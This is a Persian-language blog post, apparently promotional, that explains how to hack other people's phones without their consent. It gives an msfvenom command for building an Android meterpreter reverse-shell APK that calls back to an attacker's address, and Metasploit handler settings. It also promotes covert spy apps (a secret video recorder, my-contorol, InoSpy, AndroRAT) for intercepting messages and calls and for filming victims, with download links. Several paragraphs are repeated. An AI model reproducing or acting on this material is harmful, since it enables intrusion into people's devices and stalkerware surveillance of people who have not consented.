هک گوشی

هک گوشی دیگران بدون اجازه آنها و از طریق شماره تلفن امکان دارد؟

این روز ها بحث هک کردن گوشی یا کامپیوتر تبدیل به یک بحث فراگیر شده است. که احتمالا هرروز درباره آن مطالبی را می شنوید حتما الان سوالاتی مانند این که آیا گوشی موبایل اندرویدی یا آیفون را می شود هک کرد؟ آیا هک گوشی دیگران بدون اجازه آن ها ممکن است؟ یا از این قبیل سوالات برایتان ایجاد شده است.

مطمئن باشید که تنها شما نیستید که این سوالات را دارید و این روزها افراد زیادی به دنبال پاسخ این سوالات و روشی برای هک گوشی دیگران بدون اجازه آنها هستند. همه این سوال را دارند که هک از راه دور چگونه انجام میشود تا بتوانند اعضای خانواده و عزیزان خود را کنترل کنند.

حال آیا واقعا چگونه می شود گوشی موبایل اندرویدی یا آیفون را هک کرد؟ در این نوشته بطور کامل به بحث هک گوشی و روش های آن می پردازیم و خواهیم گفت که آیا برنامه ای برای هک گوشی دیگران بدون اجازه آنها وجود دارد و در صورت وجود به معرفی آن خواهیم پرداخت.

هک گوشی و روش های آن

هک کردن گوشی بحث پیچیده ای است و به این راحتی نمی توان درباره آن صحبت کرد چرا که یک مسئله ی بسیار کلی است و اگر منظورمان را درست بگوییم یعنی این که بتوانیم تلفن همراه دیگران را بطور کامل تحت تصرف و نفوذ خود در بیاوریم.

برای هک گوشی روش های بسیار زیادی وجود دارد که هکرهای حرفه ای به خوبی این روش ها را می دانند. اگر شما هم می خواهید این روش را فرابگیرید و به هک گوشی دیگران بدون اجازه آنها بپردازید قبل از هر چیز باید زبان های برنامه نویسی هک را بلد باشید و بعد از آن به سراغ آموزش هک گوشی و کد نویسی برای هک کردن گوشی بروید. البته باید بدانید که انجام این مراحل به همین سادگی نیست و نیازمند زمان بسیار زیاد و ذهنی آزاد است.

یکی از روش هایی که می توانید با استفاده از آن گوشی های اندرویدی را هک کنید، استفاده از سیستم عامل کالی لینوکس است که در ادامه روش هک با این سیستم عامل را توضیح خواهیم داد.

برای اینکه بتوان گوشی اندرویدی را هک کرد باید نسخه کالی لینوکس را روی سیستم خود داشته باشید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کند. با استفاده از این ابزار، هکر اقدام به ساخت یک برنامه هک اندروید به صورت APK می نماید. برای ساخت چنین ابزاری هکر تنها نیاز دارد که دستور زیر را در محیط ترمینال لینوکس وارد نماید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در دستور فوق هکر به جای عبارت LHOST می تواند از آدرس آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده کند. Name.apk نام ابزاری است که هکر آن را می سازد تا با آن اقدام به هک اندروید نماید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :
 • Msf>use exploit/multi/handler
 • Msf>set PAYLOAD android/meterpreter/reverse_tcp
 • Msf>set LHOST 192.168.1.35
 • Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کند. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک اندروید از طریق لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید نماید.

از دیگر روش های هک گوشی دیگران بدون اجازه آنها می توان استفاده و دانلود برنامه هک گوشی را عنوان کرد. اکثر برنامه های هک به گونه ای هستند که برای استفاده از آنها باید به گوشی فرد موردنظرتان دسترسی داشته باشید و برنامه را برروی گوشی آنها نصب کنید. اما برنامه هایی نیز هستند که با ارسال آنها برای فرد موردنظرتان و کلیک او برروی لینک ارسالی شما نیز می توانید عمل هک با لینک را انجام دهید. همچنین برنامه هایی هم هستند که به شما امکان هک گوشی دیگران بدون اجازه آنها و از طریق شماره تلفن را می دهند. در ادامه تعدادی از این برنامه ها را معرفی خواهیم کرد.

برنامه هک گوشی دیگران بدون اجازه

برنامه Spy Video Recorder

این نرم افزار ابزاری برای جاسوسی و تصویربرداری مخفیانه توسط گوشی موبایل فرد قربانی می باشد. نحوه کار با این برنامه بسیار ساده می باشد. این برنامه را می توانید روی گوشی خود و یا هر فردی که می خواهید نصب کنید و در زمان هایی که نباید کسی متوجه تصویربرداری شود، این برنامه می تواند به صورت مخفیانه و حتی در صورت قفل بودن گوشی شروع به فیلمبرداری نماید.

نرم افزار جاسوسی و شنود از راه دور spy

spy app یکی از نرم افزارهایی است که همه موارد ذکر شده در بالا را ارائه می دهد. این برنامه با هدف کنترل و نظارت بر اعضای خانواده طراحی و عرضه شده است. با استفاده از این برنامه می توانید به تمام پیام ها و تماس ها و همچنین کلیه فعالیت های فرزند خود در فضای مجازی نظارت داشته باشید. علاوه بر این ها با استفاده از این نرم افزار جاسوسی و شنود قادر خواهید بود تمام مکالمات اعضای خانواده خود را شنود کنید. یکی از قابلیت هایی که این برنامه را از دیگر نرم افزارهای جاسوسی متمایز می کند توانایی هک و جاسوسی از راه دور و با استفاده از شماره تلفن و اطلاعات دیگری از گوشی فرزند می باشد.

هک گوشی دیگران

برنامه Spy Video Recorder

این نرم افزار ابزاری برای جاسوسی و تصویربرداری مخفیانه توسط گوشی موبایل فرد قربانی می باشد. نحوه کار با این برنامه بسیار ساده می باشد. این برنامه را می توانید روی گوشی خود و یا هر فردی که می خواهید نصب کنید و در زمان هایی که نباید کسی متوجه تصویربرداری شود، این برنامه می تواند به صورت مخفیانه و حتی در صورت قفل بودن گوشی شروع به فیلمبرداری نماید. علاقه مندان به دانلود این نرم افزار جاسوسی و شنود می توانند از طریق لینک زیر برنامه spy video recorder را دانلود نمایند.

secretly-record-videos

لینک دانلود

نرم افزار  my-contorol

این برنامه با هدف کنترل و نظارت بر اعضای خانواده طراحی و عرضه شده است. با استفاده از این برنامه می توانید به تمام پیام ها و تماس ها و همچنین کلیه فعالیت های فرزند خود در فضای مجازی نظارت داشته باشید. علاوه بر این ها با استفاده از این نرم افزار جاسوسی و شنود قادر خواهید بود تمام مکالمات اعضای خانواده خود را شنود کنید. یکی از قابلیت هایی که این برنامه را از دیگر نرم افزارهای جاسوسی متمایز می کند توانایی هک و جاسوسی از راه دور و با استفاده از شماره تلفن و اطلاعات دیگری از گوشی فرزند می باشد.

این برنامه اکنون توسط کارشناسان ایرانی به زبان فارسی ترجمه و تغییراتی درخور کاربران ایرانی در آن اعمال شده است. همچنین my-contorol  دارای پشتیانی به زبان فارسی و به صورت آنلاین نیز می باشد. اکنون جهت کسب اطلاعات بیشتر و دانلود این برنامه می توانید برروی لینک زیر کلیک نمایید.

هک گوشی

 

دانلود نرم افزار  my-contorol

نرم افزار جاسوسی  InoSpy

InoSpy نیز یک برنامه جاسوسی قدرتمند می باشد که با هدف دسترسی به اطلاعات دیگران طراحی شده است. با استفاده از این نرم افزار می توانید به تمام پیام ها و تماس ها و تصاویر موجود در گالری گوشی و اطلاعات دیگری دسترسی پیدا کنید. این نرم افزار توسط شرکت InoSpy Specification در سال ۲۰۱۴ طراحی شده که ۴۸ ساعت نیز می تواند به صورت رایگان عمل جاسوسی را انجام دهد. پس از آن برای استفاده از این برنامه باید هزینه هایی را پرداخت نمایید.

یکی از معایب استفاده از این نرم افزار جاسوسی و شنود این است که این برنامه یک نمونه خارجی می باشد و به همین جهت از پشتیبانی فارسی برخوردار نمی باشد. علاوه بر این برای خرید این برنامه مجبور به استفاده از کریدیت کارت می باشید که این خود نیز دردسر های خاص خود و همچنین هزینه های اضافی را دربر دارد! علاقه مندان به این برنامه نیز می توانند از طریق لینک زیر اقدام به دریافت نسخه آزمایشی این برنامه نمایند.

دانلود نرم افزار جاسوسی InoSpy

 

برنامه AndroRAT

یکی از برنامه های معروف و پرطرفدار در این زمینه که تاکنون بسیار موفق عمل نموده است ، برنامه AndroRAT می باشد. نام این نرم افزار مخفف عبارت دسترسی از راه دور به دستگاه اندرویدی می باشد. این برنامه به صورت رایگان در اختیار کاربرانش قرار گرفته است و امکان هک گوشی دیگران بدون اجازه را نیز به آنها می دهد، همچنین با استفاده از این برنامه می توان اقدام به ارسال Sms به وسیله گوشی قربانی نمود. یکی از ویژگی هایی که باعث محبوبیت این برنامه شده است، قابلیت تصویر برداری با استفاده از دوربین گوشی هدف می باشد.

نرم افزار  ZANTI

بسیاری از نرم افزار ها هستند که به نرم افزارهای هک معروفند اما با هدف انجام تست نفوذ به سیستم طراحی و عرضه می شوند. نرم افزار zanty نیز یکی از این نرم افزارهاست که به کارشناسان امنیت شبکه کمک می کند در سریعترین حالت ممکن اقدام به شناسایی نقاط ضعف شبکه نمایند. این برنامه هک اندروید به برنامه Backtrack گوشی معروف می باشد، چرا که همچون سیستم عامل بک ترک لینوکس، ابزارهای مختلفی را در اختیار کاربران برای هک گوشی دیگران بدون اجازه قرار می دهد و از طرفی قدرت فوق العاده ای نیز دارد.

فروشگاه مای کنترل 

 

8 پاسخ
 1. amir kkk
  amir kkk می گوید:

  سلام به این راحتی که دوستان نظر گذاشتن هک گوشی و عکس نیست به این ساده گی ها نیست

  پاسخ
 2. معراج
  معراج می گوید:

  سلام من یک نفر گوشیو منو هک کرده و تمام عکس ها و فیلم های منو که در گالری هست ادا می کند دارد ایان این امر می‌شود یا خیر؟
  دوم اینکه اگر دوسته باشه چطوری میتونم اطلاعاتم رو از گوشیش پاکنم؟

  پاسخ

دیدگاهتان را بنویسید

می خواهید در گفت و گو شرکت کنید؟
خیالتان راحت باشد :)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *